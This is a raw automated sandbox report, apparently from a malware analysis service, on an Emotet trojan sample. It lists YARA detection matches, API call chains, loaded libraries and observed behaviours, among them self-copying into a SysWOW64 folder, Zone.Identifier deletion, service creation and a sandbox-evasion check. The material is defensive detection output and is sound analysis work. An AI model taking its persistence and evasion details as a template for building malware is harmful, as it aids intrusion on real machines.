Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: String function: 0041AEF8 appears 289 times
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: String function: 0041A329 appears 55 times
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: String function: 004490E8 appears 31 times
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: String function: 0042F7FB appears 36 times
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: String function: 00402A10 appears 50 times
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: String function: 0041AEF8 appears 289 times
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: String function: 0041A329 appears 55 times
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: String function: 004490E8 appears 31 times
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: String function: 0042F7FB appears 36 times
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: String function: 00402A10 appears 50 times

Source: ExeFile (360).exe

Static PE information: Resource name: None type: DOS executable (COM)

Source: ExeFile (360).exe, 00000000.00000000.1485324982.0000000000470000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDialupwatch.EXEP vs ExeFile (360).exe
Source: ExeFile (360).exe	Binary or memory string: OriginalFilenameDialupwatch.EXEP vs ExeFile (360).exe

Source: ExeFile (360).exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.ExeFile (360).exe.54279e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 0.2.ExeFile (360).exe.690000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 2.2.provthrd.exe.8c279e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 0.2.ExeFile (360).exe.54279e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 0.2.ExeFile (360).exe.54052e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 2.2.provthrd.exe.900000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 2.2.provthrd.exe.8c279e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 2.2.provthrd.exe.8c052e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 2.2.provthrd.exe.8c052e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 0.2.ExeFile (360).exe.54052e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
Source: 00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@0/97

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_00405E30 GetLastError,FormatMessageA,MessageBoxA,LocalFree,MessageBoxA,

0_2_00405E30

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0043791C __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,

0_2_0043791C

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: CreateServiceW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,

0_2_00698660

Source: C:\Windows\SysWOW64\dllhost\provthrd.exe

Code function: 2_2_00904B90 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32FirstW,Process32NextW,CloseHandle,FindCloseChangeNotification,

2_2_00904B90

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0040D350 CoCreateInstance,

0_2_0040D350

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0043011A FindResourceA,LoadResource,LockResource,

0_2_0043011A

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_00694F50 ChangeServiceConfig2W,GetProcessHeap,HeapFree,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetTickCount,GetProcessHeap,HeapFree,RtlFreeHeap,

0_2_00694F50

Source: ExeFile (360).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ExeFile (360).exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ExeFile (360).exe

ReversingLabs: Detection: 86%

Source: unknown	Process created: C:\Users\user\Desktop\ExeFile (360).exe "C:\Users\user\Desktop\ExeFile (360).exe"
Source: C:\Users\user\Desktop\ExeFile (360).exe	Process created: C:\Windows\SysWOW64\dllhost\provthrd.exe "C:\Windows\SysWOW64\dllhost\provthrd.exe"
Source: C:\Users\user\Desktop\ExeFile (360).exe	Process created: C:\Windows\SysWOW64\dllhost\provthrd.exe "C:\Windows\SysWOW64\dllhost\provthrd.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: odbc32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: odbc32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: ExeFile (360).exe	Static PE information: section name: RT_CURSOR
Source: ExeFile (360).exe	Static PE information: section name: RT_BITMAP
Source: ExeFile (360).exe	Static PE information: section name: RT_ICON
Source: ExeFile (360).exe	Static PE information: section name: RT_MENU
Source: ExeFile (360).exe	Static PE information: section name: RT_DIALOG
Source: ExeFile (360).exe	Static PE information: section name: RT_STRING
Source: ExeFile (360).exe	Static PE information: section name: RT_ACCELERATOR
Source: ExeFile (360).exe	Static PE information: section name: RT_GROUP_ICON

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0041203E FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0041203E

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0041C810 push eax; ret	0_2_0041C83E
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0041AEF8 push eax; ret	0_2_0041AF16
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695C50 push ecx; mov dword ptr [esp], 00008F8Eh	0_2_00695C51
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695CF0 push ecx; mov dword ptr [esp], 00000E88h	0_2_00695CF1
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695CD0 push ecx; mov dword ptr [esp], 0000A465h	0_2_00695CD1
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695C90 push ecx; mov dword ptr [esp], 00002224h	0_2_00695C91
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695D70 push ecx; mov dword ptr [esp], 0000B4A4h	0_2_00695D71
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695D20 push ecx; mov dword ptr [esp], 0000C239h	0_2_00695D21
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695DE0 push ecx; mov dword ptr [esp], 0000272Ah	0_2_00695DE1
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695DB0 push ecx; mov dword ptr [esp], 00001190h	0_2_00695DB1
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695E40 push ecx; mov dword ptr [esp], 0000C126h	0_2_00695E41
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695EE0 push ecx; mov dword ptr [esp], 00006DE4h	0_2_00695EE1
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00695EA0 push ecx; mov dword ptr [esp], 00008285h	0_2_00695EA1
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054E015 push 0000003Bh; ret	0_2_0054E01A
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054D76E push ecx; retf	0_2_0054D7A5
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_005477EE push ecx; mov dword ptr [esp], 00008F8Eh	0_2_005477EF
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054786E push ecx; mov dword ptr [esp], 0000A465h	0_2_0054786F
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054782E push ecx; mov dword ptr [esp], 00002224h	0_2_0054782F
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054788E push ecx; mov dword ptr [esp], 00000E88h	0_2_0054788F
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_005478BE push ecx; mov dword ptr [esp], 0000C239h	0_2_005478BF
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054794E push ecx; mov dword ptr [esp], 00001190h	0_2_0054794F
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054797E push ecx; mov dword ptr [esp], 0000272Ah	0_2_0054797F
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054790E push ecx; mov dword ptr [esp], 0000B4A4h	0_2_0054790F
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_005479DE push ecx; mov dword ptr [esp], 0000C126h	0_2_005479DF
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00547A7E push ecx; mov dword ptr [esp], 00006DE4h	0_2_00547A7F
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00547A3E push ecx; mov dword ptr [esp], 00008285h	0_2_00547A3F
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0041C810 push eax; ret	2_2_0041C83E
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0041AEF8 push eax; ret	2_2_0041AF16
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00905C90 push ecx; mov dword ptr [esp], 00002224h	2_2_00905C91
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00905CD0 push ecx; mov dword ptr [esp], 0000A465h	2_2_00905CD1
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00905CF0 push ecx; mov dword ptr [esp], 00000E88h	2_2_00905CF1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\ExeFile (360).exe

Executable created and started: C:\Windows\SysWOW64\dllhost\provthrd.exe

Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe

PE file moved: C:\Windows\SysWOW64\dllhost\provthrd.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\ExeFile (360).exe

File opened: C:\Windows\SysWOW64\dllhost\provthrd.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49739 -> 7080

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00412364 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00412364
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00436BB5 GetParent,GetParent,GetParent,IsIconic,	0_2_00436BB5
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00442D1A __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,	0_2_00442D1A
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00428D80 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,	0_2_00428D80
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0043F1C0 IsIconic,IsWindowVisible,	0_2_0043F1C0
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00429530 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,	0_2_00429530
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00447B19 IsWindowVisible,IsIconic,	0_2_00447B19
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00412364 IsIconic,GetWindowPlacement,GetWindowRect,	2_2_00412364
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00436BB5 GetParent,GetParent,GetParent,IsIconic,	2_2_00436BB5
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00442D1A __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,	2_2_00442D1A
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00428D80 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,	2_2_00428D80
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0043F1C0 IsIconic,IsWindowVisible,	2_2_0043F1C0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00429530 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,	2_2_00429530
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00447B19 IsWindowVisible,IsIconic,	2_2_00447B19

Source: C:\Users\user\Desktop\ExeFile (360).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ExeFile (360).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\ExeFile (360).exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_0-50609

Source: C:\Users\user\Desktop\ExeFile (360).exe	API coverage: 2.0 %
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	API coverage: 2.4 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\ExeFile (360).exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004366D0 FindFirstFileA,FindClose,	0_2_004366D0
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004356B4 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_004356B4
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_006938B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,	0_2_006938B0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004366D0 FindFirstFileA,FindClose,	2_2_004366D0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004356B4 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	2_2_004356B4
